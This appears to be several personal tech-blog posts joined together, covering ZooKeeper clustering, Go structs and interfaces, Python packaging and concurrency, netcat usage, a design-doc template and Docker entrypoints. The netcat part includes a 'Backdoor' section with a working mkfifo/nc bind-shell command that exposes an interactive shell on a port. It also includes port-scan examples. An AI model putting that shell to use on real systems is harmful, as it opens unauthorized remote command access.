For the Vagrant demo files, please see my git repo Infratree.

Introduction

ZooKeeper quorum architecture: a cluster of at least 3 nodes, set up via Vagrant for Kafka use. High-level information about zk:

  • distributed key-value store
  • has a voting mechanism
  • used by many big data tools

ZooKeeper's role in Kafka:

  • broker registration and heartbeat checking
  • maintaining the list of topics
  • leader election
  • storing the Kafka cluster id
  • storing ACLs if security is enabled
  • storing quota configs if enabled

Should you use the ZooKeeper bundled with Kafka or a standalone ZooKeeper? See this answer for reference. In my work projects we still use a standalone zk. ZooKeeper is going to be removed from Kafka, see this article.

For more references, see the ZooKeeper main page. System requirements for version 3.6.2: ZooKeeper (like Kafka) runs on Java, release 1.8 or greater (JDK 8 LTS, JDK 11 LTS, JDK 12; Java 9 and 10 are not supported).

Archive download link. For example, this post uses ZooKeeper version 3.6.2.

Performance Factors

Latency is key for zookeeper:

  • fast disk
  • no RAM swap
  • separate disk for snapshots and logs
  • high performance network
  • reasonable number of zk servers
  • isolate the zk process from others

Cluster Setup

Architecture

Clustered (Multi-Server) Setup. It lists many caveats, for example setting the Java heap size to avoid swapping, or disabling swap altogether.
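For example, a minimal sketch of capping the JVM heap via conf/java.env (assuming the bin scripts source this file when present; the 1 GB value is only an illustration, size it to your node's RAM so the JVM never swaps):

# /root/apache-zookeeper-3.6.2-bin/conf/java.env
# assumption: zkEnv.sh sources this file if it exists
export JVMFLAGS="-Xms1g -Xmx1g $JVMFLAGS"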

The architecture diagram of this experiment co-locates zk and Kafka on the same node; this is not recommended in production.

// zk leader can be any one of them

  192.168.20.20        192.168.20.21        192.168.20.22
+---------------+    +---------------+    +---------------+
|  zk server1   |<-->|  zk server2   |<-->|  zk server3   |
|  (follower)   |    |  (leader)     |    |  (follower)   |
|               |    |               |    |               |
|  kafka        |    |  kafka        |    |  kafka        |
|  broker1      |    |  broker2      |    |  broker3      |
+---------------+    +---------------+    +---------------+

// each kafka broker talks to the zk ensemble

Config

Generate zoo.cfg file in each node:

# download release binary version 3.6.2
cd /root
wget https://archive.apache.org/dist/zookeeper/zookeeper-3.6.2/apache-zookeeper-3.6.2-bin.tar.gz
tar -zxf apache-zookeeper-3.6.2-bin.tar.gz

cd /root/apache-zookeeper-3.6.2-bin/conf
cp zoo_sample.cfg zoo.cfg

Create zk data, log and conf directories in each zookeeper node:

mkdir -p /root/zk/data
mkdir -p /root/zk/log
mkdir -p /root/zk/conf

Edit the zoo.cfg file for each ZooKeeper instance; use the same configuration on all of them:

# the basic time unit in milliseconds used by zk
tickTime=2000
# leader-follower initial connection time limit: tickTime * 10 = 20 seconds
initLimit=10
# leader-follower sync communication time limit: tickTime * 5 = 10 seconds
syncLimit=5

# data dir
dataDir=/root/zk/data
# log dir
dataLogDir=/root/zk/log

# client port, all 3 nodes use the same port number
clientPort=2181
#maxClientCnxns=60

# server id and IP address, or use hostnames from /etc/hosts
# for a cluster, the server id must start from 1, not 0

# 2888: connects the individual follower nodes to the leader node
# 3888: used for leader election in the ensemble
# can be any port number
server.1=192.168.20.20:2888:3888
server.2=192.168.20.21:2888:3888
server.3=192.168.20.22:2888:3888

In the zk data directory, create a myid file for each zk instance; it must be unique:

# run on 192.168.20.20
echo 1 > /root/zk/data/myid
# run on 192.168.20.21
echo 2 > /root/zk/data/myid
# run on 192.168.20.22
echo 3 > /root/zk/data/myid

Commands

Run zk service commands:

cd /root/apache-zookeeper-3.6.2-bin/bin
# start
# default uses zoo.cfg config file
# run in background by default, has flag to run in foreground
./zkServer.sh start [path/to/zoo.cfg]
# stop
./zkServer.sh stop [path/to/zoo.cfg]

# status check
# Mode: standalone, follower, leader
./zkServer.sh status [path/to/zoo.cfg]

# test zk is good
# ipv6 + port
./zkCli.sh -server :2181
# then run
# you will see some output like [zookeeper], etc
ls /

[x] Why is port 2181 bound on IPv6? It is the same in other environments.

After starting ZooKeeper, run ./zkServer.sh status to check whether the current node is the leader or a follower. Run ./zkCli.sh to use the zk CLI; see this reference.

./zkCli.sh can also be used to connect to a zk server from outside; just specify an accessible IP and port. In this demo it runs on the same machine, so it is effectively localhost.
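For example (the address below is one of the demo nodes; adjust it to any reachable zk server):

# connect to a remote zk instance from any machine that can reach it
./zkCli.sh -server 192.168.20.21:2181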

If the start fails, check <zk package>/logs/zookeeper_audit.log. If you haven't started the other 2 zk instances yet, you will periodically see exception errors in <zk package>/logs/zookeeper-root-server-kafka1.out; they are resolved after you start all of them. Logging is controlled by the log4j configuration in <zk package>/conf/log4j.properties.

After the cluster is up and running, you can check the ports:

# see 2181, 2888, 3888
# -i: network socket
# -P: show port number
# -n: show ip address
lsof -i -P -n

# scan 2181
# -z: scan only
# -v: verbose
nc -zv <zk instance ip> 2181

In older versions, you could use the four letter words to check some status, for example:

# are you ok
echo ruok | nc localhost 2181

Newer versions have switched to the AdminServer. The AdminServer is enabled by default and is accessed over HTTP on port 8080:

# list all commands
http://192.168.20.20:8080/commands

# for example:
# state
http://192.168.20.20:8080/commands/stat
# config
http://192.168.20.20:8080/commands/configuration

ZooNavigator is a web-based ZooKeeper UI and editor/browser with many features. You can launch it as a Docker container.
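A minimal sketch, assuming the elkozmon/zoonavigator image from Docker Hub and its default HTTP port 9000:

# run ZooNavigator and expose the web UI on localhost:9000
docker run -d --name zoonavigator -p 9000:9000 elkozmon/zoonavigator:latest
# then open http://localhost:9000 and connect to 192.168.20.20:2181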

Run as Daemon

Set up ZooKeeper as a system daemon so that it is launched every time the system boots.

For a systemd ZooKeeper cluster setup on Ubuntu, see here.

Basically, first generate a zookeeper service file, for example zookeeper.service; the prefix zookeeper is the service name used in systemctl commands. Place this file in the /etc/systemd/system folder, owned by root.

Double curly brackets are placeholders in the Jinja2 template.

[Unit]
Description=Zookeeper Daemon
Documentation=http://zookeeper.apache.org
# boot after these services
# for example, here we rely on the consul and dnsmasq services
After=network-online.target consul.service dnsmasq.service
StartLimitInterval=200
StartLimitBurst=5

[Service]
# in zkServer.sh, it uses `&` to fork and exec
Type=forking
# systemd can identify the main process of the daemon
# in zkServer.sh it will echo pid to this file
PIDFile={{ zookeeper_data_dir }}/zookeeper-server.pid

User={{ zookeeper_user }}
Group={{ zookeeper_group }}
WorkingDirectory=/opt/zookeeper

# environment variables may be needed
# or configure in zoo.cfg file
Environment=ZOOPIDFILE={{ zookeeper_data_dir }}/zookeeper-server.pid
Environment=ZOOKEEPER_HOME=/opt/zookeeper
Environment=ZOOKEEPER_CONF={{ zookeeper_conf_dir }}
Environment=ZOOCFGDIR={{ zookeeper_conf_dir }}
Environment=CLASSPATH=$CLASSPATH:$ZOOKEEPER_CONF:$ZOOKEEPER_HOME/*:$ZOOKEEPER_HOME/lib/*
Environment=ZOO_LOG_DIR={{ zookeeper_log_dir }}
Environment=ZOO_LOG4J_PROP=INFO,ROLLINGFILE
Environment=JVMFLAGS=-Dzookeeper.log.threshold=INFO
Environment=ZOO_DATADIR_AUTOCREATE_DISABLE=true

# start, stop and reload commands
ExecStart=/opt/zookeeper/bin/zkServer.sh start {{ zookeeper_conf_dir }}/zoo.cfg
ExecStop=/opt/zookeeper/bin/zkServer.sh stop {{ zookeeper_conf_dir }}/zoo.cfg
ExecReload=/opt/zookeeper/bin/zkServer.sh restart {{ zookeeper_conf_dir }}/zoo.cfg

# OOM killer score adjust: -1000 (disabled) ~ 1000 (very likely to be killed)
OOMScoreAdjust=-500
Restart=on-failure
RestartSec=30

[Install]
# usually this is your system default target
WantedBy=multi-user.target

For more details about systemd, please see my systemd blog post.

Then you must enable zookeeper to start on boot:

systemctl daemon-reload
# enable start on boot
systemctl enable zookeeper

Other systemd commands:

systemctl start zookeeper
systemctl stop zookeeper
systemctl restart zookeeper

# reload config without restart
systemctl reload zookeeper
# first try reload; if not supported, then restart
systemctl reload-or-restart zookeeper

Struct

Go uses structs to implement OOP; an anonymous (embedded) field can be seen as implementing an inheritance relationship, and the "child" type can also override the "parent" type's methods.

Note that struct fields can also be exported or unexported, following the same pattern as exported and unexported variables, funcs and methods.

// Person becomes an anonymous (embedded) field in Student.
// Its fields can be accessed directly, so they are also called promoted fields.
type Person struct {
    name string
    age  int
}

type Student struct {
    Person // anonymous field, simulating inheritance; *Person also works
    school string
}

// Alternative: a named nested field must be accessed level by level.
// (Shown for comparison; a package cannot declare Student twice.)
// type Student struct {
//     person Person
//     school string
// }

// You can declare a method on non-struct types, too.

// A method is automatically associated with its receiver type.
// A value receiver gets a copy and cannot modify the original struct.
func (p Person) getName() string {
    return p.name
}

// A pointer receiver is used to modify the struct variable.
// Since methods often need to modify their receiver,
// pointer receivers are more common than value receivers.
func (p *Person) setAge() {
    p.age = p.age + 10
}

// Student "overrides" the Person method.
func (s Student) getName() string {
    return "student " + s.name
}

func main() {
    s1 := Student{Person: Person{name: "xxx", age: 12}, school: "yyy"}
    // or omit the field names:
    // s1 := Student{Person{"xxx", 12}, "yyy"}

    // promoted fields vs nested fields:
    // s1.name or s1.Person.name
    // s1.age  or s1.Person.age
    // s1.school

    // value s1 calls a pointer receiver method
    s1.setAge() // the call is interpreted as (&s1).setAge()

    s2 := &Person{"people", 23}
    // pointer s2 calls a value receiver method
    s2.getName() // the call is interpreted as (*s2).getName()
}

Interface

In Go, an interface declares method signatures; concrete types implement the method definitions.

// interface definition
type Usb interface {
    // method signatures only
    start()
    end()
}

type Mouse struct {
    name string
}

// Implementing the interface methods associates Mouse with Usb automatically,
// like `class xxx implements xxx` in Java, even though the interface name
// is never written here.
// Note: with a pointer receiver (m *Mouse), only *Mouse would satisfy Usb.
func (m Mouse) start() {
    fmt.Println("Mouse start")
}
func (m Mouse) end() {
    fmt.Println("Mouse end")
}

// use the interface as a parameter type
func testUsb(usb Usb) {
    // usb here is actually the Mouse that implements the interface
    usb.start()
    usb.end()
}

func main() {
    m := Mouse{name: "xxx"}
    testUsb(m)

    // or declare an interface variable
    var u Usb
    // u cannot access m's fields, only the interface methods
    u = m
    u.start()
    u.end()
}

An empty interface has no methods, so every type can be considered to implement it; it can be used as a function parameter to accept any data type. The main usage of the empty interface is for func arguments.

type A interface{}

// because every type implicitly implements the empty interface
// we can use interface{} as a variable type
var a1 A = "hello"
var a2 A = 123
var a3 A = true
var a4 interface{} = "hello"

// map values storing any type
var map1 = make(map[string]interface{})
// slice storing any type
var slice1 = make([]interface{}, 0)

Note that fmt.Println() is implemented exactly this way, using an anonymous empty interface.

// variadic parameters + anonymous empty interface
func Println(a ...interface{}) (n int, err error) {
    return Fprintln(os.Stdout, a...)
}

How do you determine the concrete type behind an interface? The syntax:

// instance: the value converted to the concrete type
// ok: true or false
// iface: the interface value
// ConcreteType: the concrete type you expect
instance := iface.(ConcreteType)     // may panic if the type does not match
instance, ok := iface.(ConcreteType) // the safe way

switch iface.(type) {
case string:
    // ...
case int:
    // ...
case Person:
    // ...
}

For example:

type A interface{}

// a pointer to an instance can also be passed in
func getType(a A) {
    // check whether a is an int
    if ins, ok := a.(int); ok {
        fmt.Println("int:", ins)
    }
    // struct type
    // if a pointer was passed in, write a.(*Person) instead
    if ins, ok := a.(Person); ok {
        fmt.Println("Person:", ins)
    }

    // or use a type switch
    switch ins := a.(type) {
    case int:
        fmt.Println("int:", ins)
    case Person:
        fmt.Println("Person:", ins)
    }
}

Interfaces can also be embedded (multiple "inheritance"); a type implementing C must implement all of C's own and inherited methods:

type A interface {
    testA()
}

type B interface {
    testB()
}

type C interface {
    A
    B
    testC()
}
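A minimal sketch of a concrete type satisfying C (the Impl name is just illustrative):

type Impl struct{}

func (i Impl) testA() { fmt.Println("testA") }
func (i Impl) testB() { fmt.Println("testB") }
func (i Impl) testC() { fmt.Println("testC") }

// Impl satisfies A, B and C; this compile-time check asserts it
var _ C = Impl{}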

Recently, while working on a project, I found that a package could not be installed via pip on machines other than the jump box. It turned out to be an internally developed Python package, and the jump box's pip had been configured with the internal package repo address/credential. I was not very familiar with how packages are created and published, so this post summarizes it. See also the Python Packaging User Guide.

Package and Module

Packages contain modules (a module is normally a single Python source file) or other packages. Modules are also objects with special attributes.

## urllib is package because it contains other modules or packages
## request is a nested module
import urllib.request
from urllib import request

## although both are marked as module type
type(urllib)
type(urllib.request)

## show you the package location
urllib.__path__
## error, because only package has this attribute
urllib.request.__path__

How does Python know where to import from?

import sys
## for system built-in modules
sys.path
## you can manipulate on it
sys.path.append("<path>")

Or specify it in an environment variable (see python --help):

## will append to sys.path
export PYTHONPATH=path1:path2:path3

Package Structure

package/
| ## __init__.py is usually empty; since Python 3.3 it is optional,
| ## but having it explicitly is good practice
|--- __init__.py
|--- module1.py
|--- module2.py
|
|--- subpackage1/
|    |
|    |--- __init__.py
|    |--- module3.py
|
|--- subpackage2/
     |
     |--- __init__.py
     |--- module4.py

When the package is imported, __init__.py will be executed if it has contents, so you can put initialization code there. module1.py and module2.py are normal Python source files; subpackage1 and subpackage2 are nested packages with their own modules. module1.py can import subpackage1 resources, and so on.

## absolute imports
import package
import package.module1
from package import module2

import package.subpackage1
from package.subpackage1 import module3

## relative imports
## for example, module3 wants to use something in module4
## .. has the same meaning as in the bash `cd` command
from ..subpackage2 import module4

## other forms
from . import sth
from .. import sth

Note that relative imports can only be used to import modules within the current top-level package, and only in the from ... import form.

Sometimes you will see __all__ in __init__.py; it controls the public objects you get when you do from package import *. You can still import other modules or packages explicitly.
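A minimal sketch of an __init__.py using __all__ (the module names match the layout above):

## package/__init__.py
## only module1 and module2 are pulled in by `from package import *`
__all__ = ["module1", "module2"]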

Namespace Package

Namespace packages are for splitting a single Python package across multiple directories on disk. A namespace package does not have an __init__.py.

For example, split package1 across two different paths, path1 and path2; note that the package1 top level has no __init__.py.

path1/
|
|--- package1/
     |
     |--- module1.py
     |--- ## other packages

path2/
|
|--- package1/
     |
     |--- module2.py
     |--- ## other packages

When importing:

import sys
## must include both paths
sys.path.extend(['path1', 'path2'])

import package1
## you will see 2 paths
package1.__path__
import package1.module1
import package1.module2

Executable Directory

You can execute a directory if it contains __main__.py; you can also zip the directory and run the zip file.

directory/
|
|--- __main__.py
|--- ## other modules or packages

Note that the directory has no __init__.py; it is not a package.

## it will run __main__.py
python directory

## zip it
cd directory
python -m zipfile -c ../directory.zip *
## run it
python directory.zip

This is equivalent to packaging up an executable; others do not need to assemble the individual modules and dependencies separately to use it.

Executable Package

If you want to execute a package, you also need to add __main__.py; you cannot use __init__.py for this since it is only executed on import.

package/
| ## you can wrap the function here
|--- __main__.py
|--- __init__.py
|--- ## other modules or packages
## run it, arguments will be read by __main__.py
python -m package <arguments>

Package Layout

This is the recommended structure:

project_name/
|
|--- README.rst
|--- doc/
|--- src/
|    | ## the package is here
|    |--- package/
|    ## unit test code
|--- tests/
|    |
|    |--- test_code.py
|    ## uses the setuptools package
|--- setup.py
|    ## see the later discussion
|--- tox.ini

An example setup.py:

import setuptools

setuptools.setup(
    name="<package name>",
    version="<version number>",
    author="chengdol",
    author_email="chengdol@xxx.com",
    description="...",
    url="<package access url>",
    packages=setuptools.find_packages('src'),
    package_dir={'': 'src'},
    classifiers=[
        "Programming Language :: Python :: 3",
        "License :: OSI Approved :: MIT License",
        "Operating System :: OS Independent",
    ],
    install_requires=['Flask==3.0.0', 'pysocks', 'pyyaml'],
)

About tox: it is a tool that makes automated testing convenient: tox: Automate and standardize testing in Python.
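A minimal sketch of a tox.ini for the layout above (the py38 environment name and the pytest dependency are just illustrative):

[tox]
envlist = py38

[testenv]
deps = pytest
commands = pytest tests/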

Later sections cover implementing plugins via setuptools or namespace packages; I have not used that yet.

Package Distribution

When you create a virtualenv, pip, wheel and setuptools are already installed.

There are source and built distributions. A built package can be placed directly into the installation directory and can be platform-specific; it is a .whl file. A source package is a tar.gz file and needs to be built before it can be installed. If you run pip download, you will see these distribution files.

For source package:

cd package
python setup.py sdist

## you will see a xxx.tar.gz file
cd dist
pip install xxx.tar.gz

For built package:

cd package
python setup.py bdist_wheel

## you will see a xx-py3-none-any.whl file
cd dist
## py3: python 3
## none: no ABI requirement
## any: works on any platform
pip install xx-py3-none-any.whl

Reading about what a wheel is: https://realpython.com/python-wheels/ A Python .whl file is essentially a ZIP (.zip) archive with a specially crafted filename that tells installers what Python versions and platforms the wheel will support.

A wheel is a type of built distribution. In this case, built means that the wheel comes in a ready-to-install format and allows you to skip the build stage required with source distributions.

Then you register an account on PyPI and upload the package:

## install twine
python -m pip install --user --upgrade twine

cd package
python setup.py sdist bdist_wheel && \
twine upload dist/* -u ${USER_NAME} -p ${PASSWORD}

## or upload to your personal repo
twine upload --repository-url ${PACKAGES_REPO} dist/* -u ${USER_NAME} -p ${PASSWORD}

Tool used: twine, a utility for publishing Python packages on PyPI.

After uploading, you can pip install the package in your new virtual environment.

I had almost forgotten this command, but recently I used it as a TCP client to test an Envoy TCP proxy. nc can also act as a TCP server that listens on a port and waits for connections.

Install

# install nc (netcat)
# on centos
yum install -y nc
# on ubuntu
apt install -y netcat

Note that different nc versions may support different features and options; please read the man page first!

Usage Example

Test that the networking between 2 machines is good:

# on one machine, set up listener
# default is tcp
# -l: listen
# -k: keep connection
nc -lk 1555

# on another machine
# talk to listener
echo "from client" | nc <ip> 1555

I once set up a UDP client this way to test the Logstash UDP input plugin and pipeline.
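A minimal sketch (the 5514 port is only an example; point it at whatever port the Logstash udp input listens on):

# send one UDP message to the Logstash UDP input
echo '{"msg": "hello logstash"}' | nc -u -w 1 <logstash ip> 5514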

Proxy

Connection via proxy, see man nc:

# https connect
nc -x10.2.3.4:8080 -Xconnect host.example.com 42

# proxy authentication
# -P: proxy user
nc -x10.2.3.4:8080 -Xconnect -Pruser host.example.com 42

Port Scan

Port scanning to find out which ports are open and running services on the target machine:

# -v: verbose
# -z: zero-I/O mode, report connection status only
# -w: timeout in seconds

# scan port 22 and 8080
nc -v -w 2 -z 127.0.0.1 22 8080

# range scan
nc -v -w 2 -z 127.0.0.1 1-10004

# -n: don't perform DNS resolution
nc -v -w 2 -n -z 8.8.8.8 53
# Connection to 8.8.8.8 53 port [tcp/domain] succeeded

Transfer

Data transfer, also see man nc

# the content will be put into filename.out
nc -l 1234 > filename.out

# feed it with filename.in
# -N: disconnect when finished
nc -N host.example.com 1234 < filename.in

For folder transfer:

# note the - after the tar command, used as stdin
# after it's done you will see the folder
nc -v -l 1234 | tar zxf -

# - here is used as stdout
# -N: close the connection when done
tar czf - folder | nc -N -v <ip> 1234

Other ways to transfer files: scp, sftp, python http server.
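For example, a quick one-off HTTP file server using the Python 3 standard library (port 8000 is just the default):

# serve the current directory over HTTP
python3 -m http.server 8000
# then from the other machine
curl -O http://<server ip>:8000/<filename>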

Server Client

Client/server model: a chat setup where either side can talk:

TCP server and client

# server 
# -l: listening
# -vv: verbose
# -p: listening on port 3000
nc -lk -vv -p 3000
# client
# -p: use port 6666 to connect to 3000
nc localhost -p 6666 3000

UDP server and client

# server
nc -u -lk localhost 515
# client
nc -u localhost 515

You can actually use it in scripts:

#!/bin/bash
# it will block until it gets the message
message=$(nc -l -p 1234)

# in another script, interesting
echo hi > /dev/tcp/localhost/1234

Backdoor

Execute commands on a remote machine via a backdoor opened by nc; see nc's manual:

# server side: make a named pipe
rm -f /tmp/f; mkfifo /tmp/f
# -i: interactive shell
# cat the pipe's content (sent by the client) into an interactive shell
# then redirect the output back into the pipe so it shows on the client side
cat /tmp/f | /bin/sh -i 2>&1 | nc -l 0.0.0.0 1234 > /tmp/f
# remove after done
rm -f /tmp/f

# client side
nc <server ip> 1234
# you get an interactive shell prompt
# then run commands on the remote server

Reviewer Sheet

Right after the title, list the stakeholders in a sheet:

Username | Role     | Status   | Last Change
         | Reviewer | Pending  | 2023-01-23
         | Approver | Approved |
         |          | Waiting  |

Document profile

  • Author: xxx
  • Contributors: xxx
  • Intended audience: xxx
  • Created: xxx
  • Latest update date: xxx
  • Visibility: public| confidential | need to know
  • Status: draft | review | current | needs update | obsolete
  • Self-link: xxx
  • Team: xxx
  • Hotlist/ticket: xxxx

Sections

# Context
## TL;DR
## Objective

# Requirements

# Design/Proposal (stopgap vs full-fledged solution)
## Preferred Approach
chart: Pros | Cons | Effort
## Alternative Considered
chart: Pros | Cons | Effort
## code fragment/proto, etc

# Comparison Analysis
## Reusability
## Backward Compatibility
## Ownership
## Level of effort required
## Maintainability
## Testability
## Scalability

# High level architecture
# High level workflow (sequence diagram)

# Compliance
# Dependencies
# Integration Test
# Implementation Plan / Roadmap
# Reference

Diagram

Open source, versatile tools that help with diagrams:

Here I pull the Python concurrency content out and organize it separately; it mainly covers multithreading, multiprocessing and asyncio.

Choose the concurrency pattern that fits your scenario. Types of concurrency (here we talk about running an app on a single machine): Parallel programming: working with multiple processor cores, suited for CPU-intensive tasks (CPU-bound tasks) that spend their time solving the problem rather than reading from or writing to a device. A better CPU gives better performance:

  • String operations
  • Search algorithms
  • Graphics processing

Asynchronous programming: suited for IO-intensive tasks (IO-bound tasks) that spend most of their time reading from or writing to a device, either disk or network. It is often implemented with callback functions, or with a future, promise or task whose completion the main thread can check. Use cases:

  • Database reads and writes
  • Web service calls
  • Copying, downloading, uploading data

Python Concurrency

Python has concurrency support as the diagram shows:

+-------------------------------------------------------+
|                                                       |
|               concurrent.futures (3.2+)               |
|                                                       |
|  +------------------+   +-------------------------+   |
|  | threading (1.5+) |   | multiprocessing (2.6+)  |   |
|  +------------------+   +-------------------------+   |
+-------------------------------------------------------+

+------------+
|  asyncio   |
|  (3.4+)    |
+------------+

It is worth mentioning the difference between the subprocess and multiprocessing modules here: subprocess is for running and controlling external programs, while multiprocessing is for spawning Python processes that run Python code in parallel.

Git Repo

Demo code without threads and multiprocessing: https://github.com/tim-ojo/python-concurrency-getting-started

In newer versions, logging output is captured by pytest; to get it back you can disable pytest's logging plugin explicitly:

pytest -p no:logging

Threading

The introduction here already explains it clearly: https://docs.python.org/3/library/threading.html

With multiple cores, threads can run in parallel; with only a single core, threads share time on that core.

A process starts with a main thread (note that the main thread is not the process itself; the process is like a container that provides resources and an environment, while threads are what actually execute the work), and the main thread spawns other worker threads. However, using only the basic concurrency features of threads has many pitfalls, such as thread interference and race conditions.

A note on the limitation of Python threading: because of the GIL (Global Interpreter Lock), only one Python thread can run at a time; it is not true parallelism but a form of cooperative multithreading, so use Python threads for IO-bound tasks rather than CPU-bound tasks. Workarounds are listed below, with a sketch after the list.

GIL workarounds:

  • Jython (Python implemented on the JVM)
  • IronPython
  • Python Multiprocessing
  • concurrent.futures.ProcessPoolExecutor
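A minimal sketch of the ProcessPoolExecutor workaround for CPU-bound work (the square-sum task and worker count are only illustrative):

from concurrent.futures import ProcessPoolExecutor

def cpu_bound(n):
    ## a CPU-bound task: sum of squares
    return sum(i * i for i in range(n))

if __name__ == "__main__":
    ## each task runs in its own process, each with its own GIL
    with ProcessPoolExecutor(max_workers=4) as pool:
        results = list(pool.map(cpu_bound, [10**6, 10**7, 10**6]))
    print(results)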

How do you construct threads? You can pass a callable object (function) to the constructor; the Thread class is defined as:

class threading.Thread(group=None, target=None, name=None, args=(), kwargs={}, *, daemon=None):
    pass

For example:

import threading

def do_some_work(val):
    print("doing some work in thread")
    print("echo: {}".format(val))
    return

val = "text"
## pass a callable to the constructor
## args is a tuple
t = threading.Thread(target=do_some_work, args=(val,))
## start thread t
t.start()
## the main thread waits until the spawned thread terminates
t.join()

Or by overriding the run() method in a subclass. No other methods (except for the constructor) should be overridden in a subclass. In other words, only override the __init__() and run() methods of this class.

import threading

class FibonacciThread(threading.Thread):
    def __init__(self, num):
        threading.Thread.__init__(self)
        self.num = num

    def run(self):
        fib = [0] * (self.num + 1)
        fib[0] = 0
        fib[1] = 1
        for i in range(2, self.num + 1):
            fib[i] = fib[i - 1] + fib[i - 2]
        print(fib[self.num])

myFibTask1 = FibonacciThread(9)
myFibTask2 = FibonacciThread(12)
myFibTask1.start()
myFibTask2.start()

myFibTask1.join()
myFibTask2.join()

Thread interference: a typical example is bank account deposits and withdrawals, where a race condition may occur. To synchronize threads, you can use a lock (primitive or reentrant):

  • primitive lock, any thread can release it.
  • reentrant lock, only the holder can release it; it can be acquired multiple times by the same thread.

Lock benefit: faster than other thread sync mechanisms.

import threading

## not owned by a particular thread
## create in the main thread
lock = threading.Lock()

## call in worker threads
## automatically acquires and releases the lock
with lock:
    pass  ## do something

## or use a try-finally block
lock.acquire()
try:
    pass  ## do something
finally:
    lock.release()

## check if the lock is acquired
lock.locked()

Semaphore: maintains a set of permits. Semaphores are often used to guard resources with limited capacity, for example, a database server.

## create in the main thread, default permit count is 1
## BoundedSemaphore prevents the number of releases exceeding the number of acquires
maxconnections = 5
pool_sema = threading.BoundedSemaphore(maxconnections)

## call in worker threads
## automatically acquires and releases the semaphore
with pool_sema:
    ## connect to the database server
    pass

Events: This is one of the simplest mechanisms for communication between threads: one thread signals an event and other threads wait for it.

import threading
## initially false
event = threading.Event()

## work thread
## block until event is set to true
event.wait()

## main thread
## set to true
event.set()
## set to false
event.clear()

Conditions: combine a lock and an event; used for the producer-consumer pattern.

import threading

cond = threading.Condition()

## consumer
cond.acquire()
while not an_item_is_available():
    ## wait() releases the lock;
    ## once awakened, it re-acquires the lock and returns
    cond.wait()
get_an_available_item()
cond.release()

## producer
cond.acquire()
make_an_item_available()
## since notify() does not release the lock, its caller should
cond.notify()
cond.release()

This one feels quite useful: inter-thread communication using queues. Python's queue module is essentially a synchronized queue class intended for threaded programming. 4 common methods: put(), get(), task_done(), join(). The put and get calls are blocking calls.

from queue import Queue, Empty
from threading import Thread

def img_down(producer):
    while not producer.empty():
        try:
            url = producer.get(block=False)
            ## download the image at url here
            producer.task_done()
        except Empty:
            ## write some logs
            break

## image download queue
producer = Queue()
urls = ["https://image1", "https://image2", "https://image3"]
for url in urls:
    producer.put(url)

## use only 2 threads to download
num_thread = 2
for i in range(num_thread):
    t = Thread(target=img_down, args=(producer,))
    t.start()

producer.join()

Multiprocessing

Process benefits:

  • sidesteps GIL, one GIL for every python process.
  • less need for synchronization.
  • can be paused and terminated.
  • more resilient, one crash will not bring down other processes.

multiprocessing is a package that supports spawning processes using an API similar to the threading module.

import multiprocessing

Arguments must be picklable: they are serialized and deserialized when passed between processes.

Pool, apply_async, apply; inter-process communication: pipe and queue.
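A minimal sketch of a Pool with apply_async and map (the square function and worker count are only illustrative):

import multiprocessing

def square(x):
    return x * x

if __name__ == "__main__":
    with multiprocessing.Pool(processes=4) as pool:
        ## apply_async returns an AsyncResult immediately
        async_result = pool.apply_async(square, (10,))
        print(async_result.get())          ## 100

        ## map blocks until all results are ready
        print(pool.map(square, range(5)))  ## [0, 1, 4, 9, 16]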

AsyncIO
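A minimal sketch of the asyncio style for IO-bound work (assuming Python 3.7+ for asyncio.run; the sleeps stand in for real IO calls):

import asyncio

async def fetch(name, delay):
    ## simulate an IO-bound call
    await asyncio.sleep(delay)
    return f"{name} done"

async def main():
    ## run both "requests" concurrently on a single thread
    results = await asyncio.gather(fetch("a", 1), fetch("b", 2))
    print(results)

asyncio.run(main())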

I have a post, Shell Arguments Format, that talked about exec "$@" (at the time I did not pay attention to why it is used this way in Docker). The docker-entrypoint.sh script is a very common and flexible way to accept different parameters when starting a Docker container and to run the application as PID 1, which allows the application to receive any Unix signals sent to the container (I ran into this before: a non-PID-1 process did not react to the container's termination signal).

See this docker best practice about entrypoint: https://docs.docker.com/develop/develop-images/dockerfile_best-practices/#entrypoint

The same pattern appears in the Envoy image; see this docker-entrypoint.sh link:

#!/usr/bin/env sh
set -e

# shell parameter expansion
# if LOGLEVEL is null or unset, then assign null to it
# the env variable can be set via `-e` with docker run
loglevel="${LOGLEVEL:-}"

# if the first argument looks like a parameter (i.e. starts with '-'), run Envoy
# ${1#-} checks whether the first positional parameter starts with '-':
# it expands to $1 with the shortest matching '-' prefix removed,
# so it differs from $1 only if $1 starts with '-'
if [ "${1#-}" != "$1" ]; then
    # re-set the $@ value
    # see the explanation below
    set -- envoy "$@"
fi

# the Dockerfile has CMD ['envoy']
# this is the default parameter to the entrypoint
if [ "$1" = 'envoy' ]; then
    # set the log level if the $loglevel variable is set
    if [ -n "$loglevel" ]; then
        # update the positional parameters
        set -- "$@" --log-level "$loglevel"
    fi
fi

# ENVOY_UID is the environment variable you specify
# to set the envoy user id/group
if [ "$ENVOY_UID" != "0" ]; then
    if [ -n "$ENVOY_UID" ]; then
        usermod -u "$ENVOY_UID" envoy
    fi
    if [ -n "$ENVOY_GID" ]; then
        groupmod -g "$ENVOY_GID" envoy
    fi
    # Ensure the envoy user is able to write to container logs
    chown envoy:envoy /dev/stdout /dev/stderr

    # su-exec: switch user and exec
    # https://github.com/ncopa/su-exec
    su-exec envoy "${@}"
else
    # becomes PID 1
    # note the double quotes
    exec "${@}"
fi

For example:

1
2
3
4
5
6
7
8
# start as bash
docker run --rm -it envoy_image_name:tag bash

# pass parameters `--help` and run
docker run --rm -it envoy_image_name:tag --help

# run as default CMD `envoy` with ENTRYPOINT
docker run --rm -it -e ENVOY_UID=1001 -e LOGLEVEL="info" envoy_image_name:tag

The new thing to me was set --; see this question: What does “set --” do in this Dockerfile entrypoint?

The set -- command sets the positional parameters, combining new tokens with the existing positional parameters. The -- is the standard "don't treat anything following this as an option" marker; in other words, this rearranges the positional parameters rather than just resetting them:

set a b c
# output "a b c"
echo $1 $2 $3

# equivalent to: $@ = newToken "$@"
set -- newToken "$@"
# it actually exec "newToken a b c"
exec "${@}"

Nginx Entrypoint

Let's look at one more, the nginx docker entrypoint, and explain it:

#!/bin/sh
# vim:sw=4:ts=4:et

set -e

# if quiet logs, redirect to /dev/null
# otherwise redirect to 1 (stdout)
if [ -z "${NGINX_ENTRYPOINT_QUIET_LOGS:-}" ]; then
    # link file descriptor 3 (additional) to 1 (stdout)
    # 3 is a file descriptor, see the explanation below

    # exec preserves the setting for the rest of the script
    exec 3>&1
else
    exec 3>/dev/null
fi
# why use the new fd 3: it is used by echo later, which makes it easy to manage where output is redirected

# -o: or
